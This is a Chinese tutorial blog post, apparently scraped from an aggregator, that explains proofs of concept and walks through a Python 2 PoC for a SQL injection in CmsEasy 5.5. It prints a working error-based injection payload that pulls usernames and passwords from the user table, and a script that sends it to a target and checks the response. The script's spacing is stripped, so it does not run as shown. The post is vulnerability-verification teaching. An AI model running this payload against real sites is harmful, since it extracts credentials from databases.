python中poc指的是什么意思
小編給大家分享一下python中poc指的是什么意思,希望大家閱讀完這篇文章后大所收獲,下面讓我們一起去探討吧!
0x00 我們需要掌握的幾個(gè)的概念
PoC(全稱:Proof of Concept)中文意思是“觀點(diǎn)證明”。在安全行業(yè)中PoC則是一段驗(yàn)證漏洞的程序,使我們能夠確認(rèn)這個(gè)漏洞是真實(shí)存在的。
Python,是一種面向?qū)ο蟆⒔忉屝陀?jì)算機(jī)程序設(shè)計(jì)語言。常見的一些庫我們需要了解,比如:urllib,urllib2,re,request,socket等,本文我們要使用Python這門語言,Python的基礎(chǔ)知識我們不做講解。
SQL Injection,通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。
0x01 PoC編寫流程
場景還原:某網(wǎng)站托管公司,旗下托管了數(shù)萬個(gè)站點(diǎn),負(fù)責(zé)這些站點(diǎn)的安全,但是突然某一天,某知名CMS程序被爆出存在一個(gè)高危的SQL注入,某網(wǎng)管排查后發(fā)現(xiàn)旗下托管網(wǎng)站中存在幾百個(gè)站點(diǎn)使用該CMS程序,那么一個(gè)一個(gè)去排查是否存在該漏洞是非常繁瑣的,所以,我們需要一個(gè)PoC來驗(yàn)證下。
·根據(jù)該漏洞詳情的描述,假設(shè)已知出現(xiàn)漏洞的CMS版本號為4.1,可以去其官網(wǎng)或者GitHub上去下載相對應(yīng)的版本。
·下載之后,模擬其服務(wù)器真實(shí)環(huán)境,本地進(jìn)行搭建。根據(jù)漏洞描述,進(jìn)行復(fù)現(xiàn),已SQL注入為例,重復(fù)提交不同的參數(shù),觀察不同的返回結(jié)果,同時(shí)注意如果該漏洞不存在出現(xiàn)的結(jié)果。
·根據(jù)漏洞復(fù)現(xiàn)的實(shí)際情況,進(jìn)行PoC的編寫。
·PoC寫完之后需要進(jìn)行相關(guān)的測試,已確保該P(yáng)oC的編寫沒有問題,比如測試靶機(jī)程序,以及不存在漏洞的程序。
0x02 SQL Injection poc編寫
已知CmsEasy 5.5 UTF-8程序存在SQL注入,烏云漏洞中的漏洞細(xì)節(jié)比較詳細(xì)
(由于wooyun已經(jīng)暫停訪問,故不上鏈接了)。
·首先,我們需要下載其相關(guān)源碼,進(jìn)行本地搭建。
閱讀漏洞細(xì)節(jié),我們得知其url與payload如下:
URL:http://xxx.xxx/celive/live/header.php Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20
·漏洞復(fù)現(xiàn):我們根據(jù)其漏洞描述,進(jìn)行復(fù)現(xiàn),該注入點(diǎn)需要發(fā)起一個(gè)Post請求,我們使用Firefox瀏覽器配合hackbar插件進(jìn)行復(fù)現(xiàn),填入url與payload,發(fā)送,獲取其賬戶密碼。
漏洞效果如下:
這樣,我們的漏洞就已經(jīng)復(fù)現(xiàn)成功了。接下來,我們來寫Poc。
#!/usr/bin/envpython
#coding:utf-8
importurllib2
importurllib
importre
importsys
defverify(url):
target='%s/celive/live/header.php'%url
#需要發(fā)送的數(shù)據(jù)
post_data={
'xajax':'LiveMessage',
'xajaxargs[0]':"name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password))fromcmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--"}
try:
#發(fā)送請求
req=urllib2.Request(target,data=urllib.urlencode(post_data))
response=urllib2.urlopen(req)
#處理請求,進(jìn)行判斷
ifresponse:
data=response.read()
if"XPATHsyntaxerror"indata:
print"%sisvulnerable"%target
else:
print"%sisnotvulnerable"%target
exceptException,e:
print"Somethinghappend..."
printe
defmain():
args=sys.argv
url=""
iflen(args)==2:
url=args[1]
verify(url)
else:
print"Usage:python%surl"%(args[0])
if__name__=='__main__':
main()
總結(jié)
以上是生活随笔為你收集整理的python中poc指的是什么意思的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: map的意思是什么
- 下一篇: Linux!为何他一人就写出这么强的系统